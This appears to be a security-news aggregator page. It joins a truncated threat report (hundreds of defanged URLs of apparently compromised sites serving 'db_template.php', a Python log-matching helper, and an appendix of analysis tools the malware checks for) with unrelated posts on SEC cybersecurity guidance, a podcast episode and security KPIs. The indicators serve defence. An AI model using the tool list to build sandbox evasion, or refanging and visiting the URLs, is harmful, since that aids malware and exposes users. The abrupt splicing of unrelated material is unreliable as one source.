hxxp://hesterwebber[.]co.za//db_template.php
hxxp://fickstarelectrical[.]co.za//db_template.php
hxxp://alex-frost[.]com/assets/db_template.php
hxxps://americanbrasil[.]com.br//db_template.php
hxxps://aileeshop[.]com//db_template.php
hxxps://annodle[.]com//db_template.php
hxxp://goldeninstitute[.]co.za/contents/db_template.php
hxxp://ednpk[.]com//db_template.php
hxxp://www.arabiccasinochoice[.]com//db_template.php
hxxp://proeventsports[.]co.za//db_template.php
hxxp://glenbridge[.]co.za//db_template.php
hxxp://berped[.]co.za//db_template.php
hxxp://best-digital-slr-cameras[.]com//db_template.php
hxxp://antonhirvonen[.]com/pengalandet.se/wp-includes/db_template.php
hxxp://www.alpacal[.]com//db_template.php
hxxps://www.alakml[.]com/wp-admin/db_template.php
hxxp://ar-rihla[.]com//db_template.php
hxxp://appsvoice[.]info//db_template.php
hxxp://www.bashancorp[.]co.za//db_template.php
hxxp://alexanderbecker[.]net/services/db_template.php
hxxp://visionclinic.co.ls/visionclinic/db_template.php
hxxps://www.angelesrevista[.]com//db_template.php
hxxps://www.antojoentucocina[.]com//db_template.php
hxxp://apollonweb[.]com//db_template.php
hxxps://www.alphapixa[.]com//db_template.php
hxxp://capitalradiopetition[.]co.za//db_template.php
hxxp://www.generictoners[.]co.za//db_template.php
hxxps://alnahdatraining[.]com//db_template.php
hxxps://albousala[.]com//db_template.php
hxxps://www.dopetroleum[.]com//db_template.php
hxxp://bios-chip[.]co.za//db_template.php
hxxp://www.crissamconsulting[.]co.za//db_template.php
hxxp://capriflower[.]co.za//db_template.php
hxxp://www.dingaanassociates[.]co.za//db_template.php
hxxp://indiba-africa[.]co.za//db_template.php
hxxp://verifiedseller[.]co.za/js/db_template.php
hxxps://www.buraqlubricant[.]com//db_template.php
hxxp://aqarco[.]com/wp-admin/db_template.php
hxxp://allaboutblockchain[.]net//db_template.php
hxxp://www.amexcars[.]info/tpl/db_template.php
hxxp://clandecor[.]co.za/rvsUtf8Backup/db_template.php
hxxp://bakron[.]co.za//db_template.php
hxxp://gsnconsulting[.]co.za//db_template.php
hxxp://vumavaluations[.]co.za//db_template.php
hxxp://heritagetravelmw[.]com//db_template.php
hxxp://ampvita[.]com//db_template.php
hxxp://ahero-resource-center[.]org/administrator/db_template.php
hxxps://arbulario[.]com//db_template.php
hxxp://havilahglo[.]co.za/wpscripts/db_template.php
hxxp://www.bestdecorativemirrors[.]com/More-Mirrors/db_template.php
hxxp://delectronics[.]com[.]pk//db_template.php
hxxp://antucomp[.]com//db_template.php
hxxp://advocatetn[.]com/font-awesome/fonts/db_template.php
hxxps://amooy[.]com/webservice/db_template.php
hxxp://www.harmonyguesthouse[.]co.za//db_template.php
hxxp://alanrori[.]com//db_template.php
hxxp://algarvesup[.]com//db_template.php
hxxp://desirablehair[.]co.za//db_template.php
hxxp://comsip[.]org.mw//db_template.php
hxxp://jdcorporate[.]co.za/catalog/db_template.php
hxxp://andrewfinnburhoe[.]com//db_template.php
hxxp://anyeva[.]com/wp-includes/db_template.php
hxxp://www.agenceuhd[.]com//db_template.php
hxxp://host4unix[.]net/host24new/db_template.php
hxxp://www.altaica[.]ca/wordpress/db_template.php
hxxp://www.allbuyer[.]co[.]uk//db_template.php
hxxp://jvpsfunerals[.]co.za//db_template.php
hxxp://immaculatepainters[.]co.za//db_template.php
hxxp://tcpbereka[.]co.za/js/db_template.php
hxxp://clientcare.co.ls//db_template.php
hxxp://investaholdings[.]co.za/htc/db_template.php
hxxp://www.amjobs[.]co[.]uk//db_template.php
hxxp://www.agirlgonewine[.]com/store/db_template.php
hxxp://findinfo-more[.]com//db_template.php
hxxp://asgen[.]org//db_template.php
hxxp://alphasalesrecruitment[.]com//db_template.php
hxxp://irshadfoundation[.]co.za//db_template.php
hxxp://analternatif[.]com/includes/db_template.php
hxxp://arbruisseau[.]com/profiles/db_template.php
hxxp://ladiescircle[.]co.za//db_template.php
hxxp://all-reseller[.]com/zzz_backup/db_template.php
hxxp://alcatrazmoon[.]com/images/db_template.php
hxxp://www.alcalumni[.]com/wp-includes/db_template.php
hxxp://aniljoseph[.]com/servermon/db_template.php
hxxp://alwake3press[.]com/wp-includes/db_template.php
hxxp://www.hfhl[.]org.ls/habitat/db_template.php
hxxp://alcafricanos[.]com/slsmonographs/db_template.php
hxxps://agapeencounter[.]org//db_template.php
hxxp://apobiomedix[.]ca//db_template.php
hxxp://anythinglah[.]info//db_template.php
hxxp://aniroleplay[.]net//db_template.php
hxxp://www.allcopytoners[.]com//db_template.php
hxxp://alphaobring[.]com//db_template.php
hxxp://www.galwayprimary[.]co.za//db_template.php
hxxp://alnuzha[.]org/en/db_template.php
hxxps://ancient-wisdoms[.]com//db_template.php
hxxp://amazingenergysavings[.]net//db_template.php
hxxp://gvs[.]com[.]pk/font-awesome/db_template.php
hxxp://geetransfers[.]co.za/font-awesome/db_template.php
hxxp://carlagrobler[.]co.za/components/db_template.php
hxxp://amazingashwini[.]com//db_template.php
hxxp://aminearserver[.]es//db_template.php
hxxp://lensofafrica[.]co.za//db_template.php
hxxp://greenacrestf[.]co.za/video/db_template.php
hxxp://www.tonaro[.]co.za//db_template.php
hxxp://alephit2[.]biz/kitzz/db_template.php
hxxp://lppaportal[.]org.ls//db_template.php
hxxp://alkousy[.]com//db_template.php
hxxp://ambulatorioveterinariocalusco[.]com/img/common/db_template.php
hxxp://fragranceoil[.]co.za//db_template.php
hxxp://www.eloquent[.]co.za/nweb2/db_template.php
hxxp://chrishanicdc[.]org/wpimages/db_template.php
hxxp://ahc.me[.]uk//db_template.php
hxxp://www.britishasia-equip[.]co[.]uk//db_template.php
hxxp://always-beauty[.]ch//db_template.php
hxxps://www.ancamamara[.]com/wp-admin/db_template.php
hxxp://entracorntrading[.]co.za//db_template.php
hxxp://www.alexjeffersonconsulting[.]com/wp-includes/db_template.php
hxxp://americabr[.]com.br//db_template.php
hxxp://andrew-snyder[.]net/bootstrap/db_template.php
hxxp://signsoftime[.]co.za//db_template.php
hxxp://aperta-armis[.]org//db_template.php
hxxp://absfinancialplanning[.]co.za/images/db_template.php
hxxp://charispaarl[.]co.za//db_template.php
hxxp://indlovusecurity[.]co.za//db_template.php
hxxp://alcafricandatalab[.]com//db_template.php
hxxp://amor-clubhotels[.]com//db_template.php
hxxp://mokorotlocorporate[.]com//db_template.php
hxxp://apppriori[.]com//db_template.php
hxxp://luxconprojects[.]co.za//db_template.php
hxxp://androidphonetips[.]com/wp-includes/db_template.php
hxxp://angel-seeds[.]com.ua/catalog/db_template.php
hxxp://alissanicolai[.]com/assets/db_template.php
hxxps://www.amateurastronomy[.]org//db_template.php
hxxp://aiofotoevideo[.]com//db_template.php
hxxp://www.amika.hr//db_template.php
hxxp://comfortex[.]co.za/php/db_template.php
hxxp://deepgraphics[.]co.za//db_template.php
hxxps://agiledepot[.]com//db_template.php
hxxp://almatours[.]gr//db_template.php
hxxp://analystcnwang[.]com//db_template.php
hxxp://www.malboer[.]co.za/trendy1/db_template.php
hxxp://sefikengfarm.co.ls//db_template.php
hxxp://www.antirughenaturale[.]com/wp-admin/db_template.php
hxxp://passright[.]co.za//db_template.php
hxxp://seismicfactory[.]co.za//db_template.php
hxxp://alessandroalessandrini[.]it//db_template.php
hxxps://aquabsafe[.]com//db_template.php
hxxp://amatikulutours[.]com/tmp/db_template.php
hxxp://ganitis[.]gr//db_template.php
hxxp://aleenasgiftbox[.]com/admin/db_template.php
hxxps://allusdoctors[.]com/themes/db_template.php
hxxp://alainsaffel[.]com//db_template.php
hxxp://www.ariehandomri[.]com//db_template.php
hxxp://aquaneeka[.]co[.]uk/wp-includes/db_template.php
hxxp://itengineering[.]co.za/gatewaydiamond/db_template.php
hxxp://alldomains-crm[.]com/bubblegumpopcorn[.]com/wp-admin/db_template.php
hxxp://www.albertamechanical[.]ca//db_template.php
hxxp://alchamel[.]info//db_template.php
hxxps://almokan[.]net/wp-includes/db_template.php
hxxp://jakobieducation[.]co.za//db_template.php
hxxps://arc-sec[.]net//db_template.php
hxxp://ldams[.]org.ls/supplies/db_template.php
hxxp://menaboracks[.]co.za/tmp/db_template.php
hxxp://www.getcord[.]co.za//db_template.php
hxxp://boardaffairs[.]com//db_template.php
hxxp://capetownway[.]co.za//db_template.php
hxxp://cloudhostdesign[.]com//db_template.php
hxxp://hartenboswaterpark[.]co.za/templates/db_template.php
hxxp://fccorp[.]co.za/php/db_template.php
hxxp://angar68[.]com//db_template.php
hxxp://www.dws-gov[.]co.za//db_template.php
hxxp://alwahahweb[.]com//db_template.php
hxxp://anuragcreatives[.]com//db_template.php
hxxp://embali[.]co.za//db_template.php
hxxp://albertaedmonton[.]com/widgetstyles/db_template.php
hxxp://altosdefontana[.]com//db_template.php
hxxp://airfanhydro[.]net//db_template.php
hxxps://www.alexponcet[.]com/wp-includes/db_template.php
hxxp://agropecuariavilarica[.]com.br//db_template.php
hxxps://www.amazingbuyrd[.]com/admin/db_template.php
hxxp://cdxtrading[.]co.za//db_template.php
hxxp://interafricaconsulting[.]com/wpimages/db_template.php
hxxp://glgroup[.]co.za/images/db_template.php
hxxp://hisandherskennels[.]co.za/php/db_template.php
hxxp://alemaohost[.]com/lotosorg[.]com/db_template.php
hxxp://isibaniedu[.]co.za/admin/db_template.php
hxxp://dianakleyn[.]co.za/layouts/db_template.php
hxxp://themotoringcalendar[.]co.za//db_template.php
hxxp://www.loansonhomes[.]co.za//db_template.php
hxxp://edgesecurity[.]co.za/js/db_template.php
hxxp://highschoolsuperstar[.]co.za/files/db_template.php
hxxp://www.ambientproperty[.]com//db_template.php
hxxp://animationshowreel[.]co.il//db_template.php
hxxp://cafawelding[.]co.za/font-awesome/db_template.php
hxxp://apalawyers.pt//db_template.php
hxxp://www.edesignz[.]co.za//db_template.php
hxxp://centuryacademy[.]co.za/css/db_template.php
hxxps://ambyenta.hr//db_template.php
hxxp://ceramica[.]co.za//db_template.php
hxxp://www.alfredoposada[.]com//db_template.php
hxxp://anastasovsworkshop[.]com/wp-includes/db_template.php
hxxp://allisonplumbing[.]com/wp-includes/db_template.php
hxxp://eastrandmotorlab[.]co.za/fleet/db_template.php
hxxp://angelsongroup[.]com/wp-includes/db_template.php
hxxp://www.mikimaths[.]com//db_template.php
hxxp://hjb-racing[.]co.za/htdocs/db_template.php
hxxp://anotherpartofme[.]com/wp-includes/db_template.php
hxxp://www.andreabelfi[.]com//db_template.php
hxxp://www.iancullen[.]co.za//db_template.php
hxxp://alaskamaterials[.]com//db_template.php
hxxp://jeanetteproperties[.]co.za//db_template.php
hxxp://www.digitalmedia[.]co.za//db_template.php
hxxp://www.rejoicetheatre[.]com//db_template.php
hxxps://alterwebhost[.]com//db_template.php
hxxp://bc-u[.]co[.]uk//db_template.php
hxxp://dpscdgkhan.edu[.]pk/shopping/db_template.php
hxxp://edgeforensic[.]co.za//db_template.php
hxxp://willpowerpos[.]co.za//db_template.php
hxxp://antrismode[.]com/wp-includes/db_template.php
hxxp://colenesphotography[.]co.za/modules/db_template.php
hxxp://anthaigroup.vn//db_template.php
hxxps://alphainvestors[.]com.au//db_template.php
hxxps://aliart[.]nl//db_template.php
hxxps://allmantravel[.]com/thumbs/db_template.php
hxxp://fbrvolume[.]co.za//db_template.php
hxxp://amordegato[.]es/storefront/db_template.php
hxxp://agylub[.]com//db_template.php
hxxp://www.khotsonglodge.co.ls//db_template.php
hxxp://ampli5yd[.]com//db_template.php
hxxps://animeok[.]co.il//db_template.php
hxxps://arbeidsrechtcentrum[.]nl//db_template.php
hxxp://erniecommunications[.]co.za/js/db_template.php
hxxp://promechtransport[.]co.za/scripts/db_template.php
hxxp://centuriongsd[.]co.za//db_template.php
hxxp://www.agencesylvieleclerc[.]com//db_template.php
hxxp://delcom[.]co.za//db_template.php
hxxps://aleoestudio[.]com/gallonature/db_template.php
hxxp://oftheearthphotography[.]com/www/db_template.php
hxxp://h-dubepromotions[.]co.za//db_template.php
hxxp://www.alessioborzuola[.]com/downloads/db_template.php
hxxp://crystaltidings[.]co.za//db_template.php
hxxp://funeralbusinesssolution[.]com/email_template/db_template.php
hxxp://funisalodge[.]co.za/data1/db_template.php
hxxp://experttutors[.]co.za//db_template.php
hxxps://www[.]cartridgecave[.]co.za//db_template.php
hxxp://ecs-consult[.]com//db_template.php
hxxp://www.animationinisrael[.]org/tmp_images/db_template.php
hxxp://gideonitesprojects[.]com//db_template.php
hxxp://hybridauto[.]co.za/photography/db_template.php
hxxp://africanpixels.zar.cc//db_template.php
hxxp://ryanchristiefurniture[.]co.za//db_template.php
hxxp://evansmokaba[.]com/evansmokaba[.]com/thabiso/db_template.php
hxxp://almeriahotelja[.]com/dk/db_template.php
hxxp://al3abflash[.]biz//db_template.php
hxxp://www.fun4kidz[.]co.za//db_template.php
hxxp://alsharhanstore[.]com//db_template.php
hxxp://www[.]infratechconsulting[.]com//db_template.php
hxxp://algihad[.]com/assets/db_template.php
hxxp://americanwestmedia[.]com//db_template.php
hxxp://charliewestsecurity[.]co.za//db_template.php
hxxp://beehiveholdingszar[.]co.za//db_template.php
hxxp://analyticalfootball[.]com//db_template.php
hxxp://apiiination[.]com/leadership/db_template.php
hxxps://ahelicoptermom[.]com/wp-includes/db_template.php
hxxp://servicebox[.]co.za//db_template.php
hxxp://globalelectricalandconstruction[.]co.za/wpscripts/db_template.php
hxxps://aquo[.]in//db_template.php
hxxps://www.alfransia[.]com/wp-admin/db_template.php
hxxp://www.icsswaziland[.]com//db_template.php
hxxp://aiko.pro//db_template.php
hxxps://alceharfield[.]com//db_template.php
hxxp://indocraft[.]co.za/test/db_template.php
hxxp://allegiancesecurity[.]org//db_template.php
hxxp://sullivanprimary[.]co.za//db_template.php
hxxp://www.apmequestrian[.]com//db_template.php
hxxps://alphawaves[.]org/wp-admin/db_template.php
hxxp://www.alexandrasternin[.]com/illustration/db_template.php
hxxp://www.daleth[.]co.za//db_template.php
hxxp://jwseshowe[.]co.za/assets/db_template.php
hxxp://winagainstebola[.]com//db_template.php
hxxp://anubandh[.]in//db_template.php
hxxp://www.alexanderhomestead[.]com//db_template.php
hxxp://alfatek-intelligence[.]com//db_template.php
hxxp://www.aprendiendoencasa[.]com/wp-includes/db_template.php
hxxp://alorabrownies[.]com/wp-admin/db_template.php
hxxp://andrasadam[.]com/tothildiko/wp-includes/db_template.php
hxxp://cazochem[.]co.za/cazochem/db_template.php
hxxp://debnoch[.]com/image/db_template.php
hxxp://hmholdings360[.]co.za//db_template.php
hxxp://iinvest4u[.]co.za//db_template.php
hxxp://burgercoetzeeattorneys[.]co.za//db_template.php
hxxp://anngrigphoto[.]com//db_template.php
hxxp://alchemistasonida[.]com//db_template.php
hxxp://anahera[.]biz/admin/db_template.php
hxxp://h-u-i[.]co.za/heiren/db_template.php
hxxp://insta-art[.]co.za//db_template.php
hxxp://muallematsela[.]com//db_template.php
hxxp://aguasdecastilla[.]com/uploads/db_template.php
hxxp://www.arabgamenetwork[.]com//db_template.php
hxxps://arhiepiscopiabucurestilor[.]ro/templates/db_template.php
hxxp://amruthavana[.]com/blog/db_template.php
hxxp://digitalblue[.]co.za//db_template.php
hxxps://www.alvarezarquitectos[.]com//db_template.php
hxxp://buboobioinnovations[.]co.za/wpimages/db_template.php
hxxp://andrewsbisom[.]com//db_template.php
hxxp://www.m-3[.]co.za//db_template.php
hxxp://beesrenovations[.]co.za/images/db_template.php
hxxps://www.apliety[.]co.il/wp-includes/db_template.php
hxxp://alchamelup[.]org/htdocs/db_template.php
hxxp://benonicoc[.]co.za/resources/db_template.php
hxxps://al-mostakbl[.]com//db_template.php
hxxp://alchimiegrafiche[.]net/bbdelteatro/db_template.php
hxxp://andrespazsoldan[.]com//db_template.php
hxxp://in2accounting[.]co.za//db_template.php
hxxp://aipa[.]ca//db_template.php
hxxp://alphabee.fund/PHPMailer_5.2.0/db_template.php
hxxp://arabsdeals[.]com//db_template.php
hxxps://archiotronic[.]com/wp-includes/db_template.php
hxxp://capewindstrading[.]co.za//db_template.php
hxxps://althurayaa[.]com//db_template.php
hxxp://jhphotoedits[.]co.za//db_template.php
hxxp://cloudhub.co.ls/modules/db_template.php
hxxp://apironco[.]com/wp-includes/db_template.php
hxxp://digital-cameras-south-africa[.]co.za/script/db_template.php
hxxp://ahmadhasanat[.]com//db_template.php
hxxp://alexrocchi[.]com//db_template.php
hxxp://aljaadi[.]com//db_template.php
hxxps://www.engeltjieakademie[.]co.za//db_template.php
hxxp://annabelle[.]nl/next/db_template.php
hxxp://juniorad[.]co.za/vendor/db_template.php
hxxp://animationpulse[.]net//db_template.php
hxxp://angloglot[.]com//db_template.php
hxxp://agricolavicuna.cl//db_template.php
hxxp://alexelgy[.]com/allaccess/db_template.php
hxxp://www.centreforgovernance[.]uk//db_template.php
hxxp://www.aliandconsulting[.]com//db_template.php
hxxp://balaateen[.]co.za/less/db_template.php
hxxp://aleksicdunja[.]com//db_template.php
hxxp://arestihome[.]com//db_template.php
hxxp://am1int.fcomet[.]com/wp1/db_template.php
hxxp://anet-international-group[.]com/shop/db_template.php
hxxp://courtesydriving[.]co.za/js/db_template.php
hxxp://annaplebanek[.]com//db_template.php
hxxp://agencijazemil[.]com//db_template.php
hxxp://airminumtiro[.]com//db_template.php
hxxp://www.androidwikihow[.]com//db_template.php
hxxp://alisabyfinna[.]com//db_template.php
hxxp://rma-law[.]co.za//db_template.php
hxxp://amari[.]ro/components/db_template.php
hxxp://anxiousandunstoppable[.]com//db_template.php
hxxp://www.buhlebayoacademy[.]com//db_template.php
hxxp://arabellajo[.]com/wp/wp-includes/db_template.php
hxxp://blackthorn[.]co.za//db_template.php
hxxp://alaqaba[.]com/dnsarabia[.]com/db_template.php
hxxp://airesis.blog/wp-admin/db_template.php
hxxp://www.aptibet[.]org//db_template.php
hxxp://alecattic[.]com/wp-includes/db_template.php
hxxp://anglero[.]com//db_template.php
hxxp://getabletravel[.]co.za/wpscripts/db_template.php
hxxp://www.allwestdental[.]com/wp-includes/db_template.php
hxxp://printernet[.]co.za//db_template.php
hxxp://genesisbs[.]co.za//db_template.php
hxxp://allsporthealthandfitness[.]com//db_template.php
hxxp://www.humorcarbons[.]com//db_template.php
hxxp://intelligentprotection[.]co.za//db_template.php
hxxp://amazethings[.]com//db_template.php
hxxp://incoso[.]co.za/images/db_template.php
hxxp://www.antoanetapalikarska[.]com//db_template.php
hxxps://www.alteaparadise[.]com/wp-includes/db_template.php
hxxp://amirmenahem[.]com//db_template.php
hxxp://isound[.]co.za//db_template.php
hxxp://www.alestilorachel[.]com//db_template.php
hxxp://alcfm[.]net/wp-admin/db_template.php
hxxp://www.acer-parts[.]co.za//db_template.php
hxxp://www.gsmmid[.]com//db_template.php
hxxp://skhaleni[.]co.za//db_template.php
hxxps://amiici.vision//db_template.php
hxxps://andihaas[.]at/wp-includes/db_template.php
hxxp://www.albertaprimebeef[.]com//db_template.php
hxxps://www.appster[.]it/wp-includes/db_template.php
hxxp://amofoundation[.]org/wp-includes/db_template.php
hxxp://iqra[.]co.za/pub/db_template.php
hxxp://thecompasssolutions[.]co.za//db_template.php
hxxp://archwaycarpetscrm[.]co[.]uk//db_template.php
hxxp://iggleconsulting[.]com//db_template.php
hxxps://angel-blanco[.]net/wp-includes/db_template.php
hxxps://anotherdayinparadise[.]ca//db_template.php
hxxp://www.bitp[.]co.za//db_template.php
hxxp://cupboardcure[.]co.za/vendor/db_template.php
hxxp://all2wedding[.]com/wp-includes/db_template.php
hxxp://allianz[.]com.pe/wp-admin/db_template.php
hxxp://amiehepperlin[.]com//db_template.php
hxxps://www.amighini[.]it/webservice/db_template.php
hxxp://broken-arrow[.]co.za//db_template.php
hxxp://www.ihlosiqs-pm[.]co.za//db_template.php
hxxp://alisimple[.]si/wp-includes/db_template.php
hxxp://allthat[.]social//db_template.php
hxxp://www.amphibiblechurch[.]com//db_template.php
hxxp://bestencouragementwords[.]com//db_template.php
hxxp://alayhamtechnologies[.]com//db_template.php
hxxps://alaskanharvestseafood[.]com/backup/db_template.php
hxxps://www.air-mag[.]ro//db_template.php
hxxp://get-paid-for-online-survey[.]com//db_template.php
hxxp://www.antc[.]ch/wp-includes/db_template.php
hxxp://firstchoiceproperties[.]co.za//db_template.php
hxxp://habibtextiles[.]pk//db_template.php
hxxp://fsproperties[.]co.za/engine1/db_template.php
hxxp://diegemmerkat[.]co.za//db_template.php
hxxp://molepetravel.co.ls//db_template.php
hxxp://mmetl[.]co.za//db_template.php
hxxp://altrablog[.]com//db_template.php
hxxp://abrahamseed[.]co.za//db_template.php
hxxp://www.amerindgen[.]com/author/admin1/db_template.php
hxxp://altcoinaddict[.]com//db_template.php
hxxp://iiee.edu[.]pk//db_template.php
hxxp://cmhts[.]co.za/resources/db_template.php
hxxp://domesticguardians[.]co.za/Banner/db_template.php
hxxps://amishcountryfurnishings[.]com//db_template.php
hxxps://allday[.]gr//db_template.php
hxxp://www.alinn-u-yin[.]com//db_template.php
hxxps://www.allin-chain[.]com//db_template.php
hxxps://www.anatapackaging[.]com/vendors/db_template.php
hxxp://alexcelts[.]com/wp/db_template.php
hxxp://www.allstylus[.]com.br//db_template.php
hxxp://www.algom-law[.]com//db_template.php
hxxp://ambiances-toiles[.]fr//db_template.php
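The indicators above are defanged (hxxp, [.]) so they cannot be clicked by accident, which also means they cannot be fed to a proxy or DNS blocklist as-is. The following helper is an added example, not part of the original report: it refangs indicators in this style, normalizes them to (host, path) pairs (the `//db_template.php` double slash is collapsed so it compares equal to `/db_template.php`), emits a de-duplicated host list, and runs the resulting set over proxy log lines. The five-line `SAMPLE_IOCS` subset and the squid-style `SAMPLE_LOG` lines are constructed for the example; the log format is an assumption.

```python
from __future__ import annotations
import re
from urllib.parse import urlsplit

# Constructed subset in the same defanged style as the list above (not the full list).
SAMPLE_IOCS = """\
hxxp://hjb-racing[.]co.za/htdocs/db_template.php
hxxps://alterwebhost[.]com//db_template.php
hxxp://bc-u[.]co[.]uk//db_template.php
hxxp://www[.]infratechconsulting[.]com//db_template.php
hxxp://alphabee.fund/PHPMailer_5.2.0/db_template.php
"""

# Constructed proxy log lines ("timestamp client method url"); the format is an assumption.
SAMPLE_LOG = """\
1520000001.101 10.0.0.12 GET http://hjb-racing.co.za/htdocs/db_template.php
1520000002.202 10.0.0.12 GET https://www.example.org/index.html
1520000003.303 10.0.0.33 POST http://BC-U.co.uk/db_template.php
1520000004.404 10.0.0.33 GET http://alphabee.fund/PHPMailer_5.2.0/class.phpmailer.php
"""


def refang(ioc: str) -> str:
    """Reverse common defanging so the indicator parses as a real URL."""
    s = ioc.strip()
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)
    s = s.replace("[://]", "://")
    s = re.sub(r"[\[(]\.[\])]", ".", s)  # "[.]" and "(.)" -> "."
    return s


def normalize_url(url: str) -> tuple[str, str]:
    """Return (host, path): host lower-cased, runs of '/' in the path collapsed.

    The scheme is deliberately dropped: the same path is served over http and
    https in the list, and the host+path is what identifies the drop site."""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    path = re.sub(r"/{2,}", "/", u.path) or "/"
    return host, path


def load_indicators(text: str) -> set[tuple[str, str]]:
    """Parse one defanged indicator per line into a set of (host, path) pairs."""
    return {normalize_url(refang(line)) for line in text.splitlines() if line.strip()}


def indicator_hosts(text: str) -> list[str]:
    """Sorted, de-duplicated hostnames, e.g. for a DNS or proxy blocklist."""
    return sorted({host for host, _ in load_indicators(text)})


def match_log(log_text: str, indicators: set[tuple[str, str]]) -> list[str]:
    """Return the log lines whose requested URL matches an indicator on (host, path)."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed line; skip rather than crash the sweep
        if normalize_url(parts[3]) in indicators:
            hits.append(line)
    return hits


if __name__ == "__main__":
    indicators = load_indicators(SAMPLE_IOCS)
    print("\n".join(indicator_hosts(SAMPLE_IOCS)))
    for hit in match_log(SAMPLE_LOG, indicators):
        print("HIT:", hit)
```

Matching on host and path rather than on the file name alone avoids flagging every unrelated `db_template.php` on the internet; if you want the looser check, compare only `path.rsplit("/", 1)[-1]` and accept the extra false positives knowingly.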
Appendix
Security Tools Checked on the Machine
win32_remote
win64_remote64
ollydbg
ProcessHacker
tcpview
autoruns
autorunsc
filemon
procmon
regmon
procexp
idaq
idaq64
ImmunityDebugger
Wireshark
dumpcap
HookExplorer
ImportREC
PETools
LordPE
dumpcap
SysInspector
proc_analyzer
sysAnalyzer
sniff_hit
windbg
joeboxcontrol
joeboxserver
Webinar Recording Available on SEC Cybersecurity Guidance
On March 7, 2018, Hunton & Williams LLP hosted a webinar with partners Lisa Sotto, Aaron Simpson and Scott Kimpel, and senior associate Brittany Bacon on the Securities and Exchange Commission’s (“SEC’s”) recently released cybersecurity guidance. For the first time since its last major staff pronouncement on cybersecurity in 2011, the SEC has released new interpretive guidance for public companies that will change the way issuers approach cybersecurity risk.
Sotto, Simpson, Kimpel and Bacon discussed this new guidance within the context of the current cyber threat landscape, including outlining changes in regulatory obligations under EU law with respect to the upcoming GDPR and historical SEC enforcement actions related to cybersecurity.
View a recording of the webinar.
Early Bird Gets The Worm – Application Security Weekly #08
This week, Paul and Keith talk about “The Phoenix Project”, Amazon admits Alexa is creepily laughing at people, Ethereum fixes serious ‘eclipse’ flaw, Kali Linux is now an app in the Windows App Store, Docker + Minecraft = Dockercraft, and more on this episode of Application Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ASW_Episode08
Visit https://www.securityweekly.com/asw for all the latest episodes!
Measure Security Performance, Not Policy Compliance – The Falcon’s View
I started my security (post-sysadmin) career heavily focused on security policy frameworks. It took me down many roads, but everything always came back to a few simple notions, such as that policies were a means of articulating security direction, that you had to prescriptively articulate desired behaviors, and that the more detail you could put into the guidance (such as in standards, baselines, and guidelines), the better off the organization would be. Except, of course, that in the real world nobody ever took time to read the more detailed documents, Ops and Dev teams really didn't like being told how to do their jobs, and, at the end of the day, I was frequently reminded that publishing a policy document didn't translate to implementation.
Subsequently, I've spent the past 10+ years thinking about better ways to tackle policies, eventually reaching the point where I believe "less is more" and that anything written and published in a place and format that isn't "work as usual" will rarely, if ever, get implemented without a lot of downward force applied. I've seen both good and bad policy frameworks within organizations. Often they cycle around between good and bad. Someone will build a nice policy framework, it'll get implemented in a number of key places, and then it will languish from neglect and inadequate upkeep until it's irrelevant and ignored. This is not a recipe for lasting success.
Thinking about it further this week, it occurred to me that part of the problem is thinking in the old "compliance" mindset. Policies are really to blame for driving us down the checkbox-compliance path. Sure, we can easily stand back and try to dictate rules, but without the adequate authority to enforce them, and without the resources needed to continually update them, they're doomed to obsolescence. Instead, we need to move to that "security as code" mentality and find ways to directly codify requirements in ways that are naturally adapted and maintained.
End Dusty Tomes and (most) Out-of-Band Guidance
The first daunting challenge of security policy framework reform is to throw away the old, broken approach with as much gusto and finality as possible. Yes, there will always be a need for certain formally documented policies, but overall an organization Does. Not. Need. large amounts of dusty tomes providing out-of-band guidance to a non-existent audience.
Now, note a couple things here. First, there is a time and a place for providing out-of-band guidance, such as via direct training programs. However, it should be the minority of guidance, and wherever possible you should seek to codify security requirements directly into systems, applications, and environments. For a significant subset of security practices, it turns out we do not need to repeatedly consider whether or not something should be done, but can instead make the decision once and then roll it out everywhere as necessary and appropriate.
Second, we have to realize and accept that traditional policy (and related) documents only serve a formal purpose, not a practical or pragmatic purpose. Essentially, the reason you put something into writing is because a) you're required to do so (such as by regulations), or b) you're driven to do so due to ongoing infractions or the inability to directly codify requirements (for example, requirements on human behavior). What this leaves you with are requirements that can be directly implemented and that are thus easily measurable.
KPIs as Policies (et al.)
If the old ways aren't working, then it's time to take a step back and think about why that might be and what might be better going forward. I'm convinced the answer to this query lies in stretching the "security as code" notion a step further by focusing on security performance metrics for everything and everyone instead of security policies. Specifically, if you think of policies as requirements, then you should be able to recast those as metrics and key performance indicators (KPIs) that are easily measured, and in turn are easily integrated into dashboards. Moreover, going down this path takes us into a much healthier sense of quantitative reasoning, which can pay dividends for improved information risk awareness, measurement, and management.
Applied, this approach scales very nicely across the organization. Businesses already operate on a KPI model, and converting security requirements (née policies) into specific measurables at various levels of the organization means ditching the ineffective, out-of-band approach previously favored for directly specifying, measuring, and achieving desired performance objectives. Simply put, we no longer have to go out of our way to argue for people to conform to policies, but instead simply start measuring their performance and incentivize them to improve to meet performance objectives. It's then a short step to integrating security KPIs into all roles, even going so far as to establish departmental, if not whole-business, security performance objectives that are then factored into overall performance evaluations.
Examples of security policies-become-KPIs might include metrics around vulnerability and patch management, code defect reduction and remediation, and possibly even phishing-related metrics that are rolled up to the department or enterprise level. When creating security KPIs, think about the policy requirements as they're written and take time to truly understand the objectives they're trying to achieve. Convert those objectives into measurable items, and there you are on the path to KPIs as policies. For more on thoughts on security metrics, I recommend checking out the CIS Benchmarks as a starting point.
Better Reporting and the Path to Accountability
Converting policies into KPIs means that nearly everything is natively built for reporting, which in turn enables executives to have better insight into the security and information risk of the organization. Moreover, shifting the focus to specific measurables means that we get away from the out-of-band dusty tomes, instead moving toward achieving actual results. We can now look at how different teams, projects, applications, platforms, etc., are performing and make better-informed decisions about where to focus investments for improvements.
This notion also potentially sparks an interesting future for current GRC-ish products. If policies go away (mostly), then we don't really need repositories for them. Instead, GRC products can shift to being true performance monitoring dashboards, allowing those products to broaden their scope while continuing to adapt other capabilities, such as those related to the so-called "SOAR" market (Security Orchestration, Automation, and Response). If GRC products are to survive, I suspect it will be by either heading further down the information risk management path, pulling in security KPIs in lieu of traditional policies and compliance, or it will drive more toward SOAR+dashboards with a more tactical performance focus (or some combination of the two). Suffice to say, I think GRC as it was once known and defined is in its final days of usefulness.
